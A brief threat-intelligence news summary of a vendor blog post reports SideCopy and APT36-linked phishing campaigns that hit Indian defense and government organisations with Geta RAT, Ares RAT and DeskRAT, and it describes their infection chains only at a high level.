Multiple campaigns targeted Indian defense and government aligned organizations in late 2025 and early 2026 and used remote access trojans to compromise Windows and Linux environments, a blog post by Aryaka said.
KEY FACTS
- Incident Multiple targeted campaigns against Indian defense and government aligned organizations
- Timing Activity observed in late 2025 and early 2026
- Malware Geta RAT, Ares RAT and DeskRAT used to provide remote access
- Delivery Phishing lures with malicious LNK, ELF and PowerPoint Add In files
One common Windows chain begins with a malicious LNK file that invokes mshta.exe to run an HTA hosted on compromised domains. The HTA contains JavaScript that decrypts and loads a DLL. The DLL processes an embedded blob to write a decoy PDF to disk, connect to a hard coded command and control server and display the decoy.
After the lure is displayed the malware checks for installed security products and adapts its persistence method before deploying Geta RAT on the host. Geta RAT provides persistent remote access and supports commands to collect system information, enumerate and kill processes, list installed applications, harvest credentials, replace clipboard contents, capture screenshots, perform file operations and execute shell commands.
Parallel Linux activity starts with a Go binary that drops a Python based Ares RAT by running a shell script downloaded from an external server. A separate campaign uses a rogue PowerPoint Add In with an embedded macro that fetches a Golang malware called DeskRAT.
The campaigns use defense themed lures, impersonated official documents and regionally trusted infrastructure. The malware families and operational patterns align with clusters tracked as SideCopy and APT36, and SideCopy has been active since at least 2019.
WHY IT MATTERS
The combination of cross platform trojans, memory resident techniques and trusted regional lures increases the risk of prolonged access and data theft for targeted defence and policy organisations.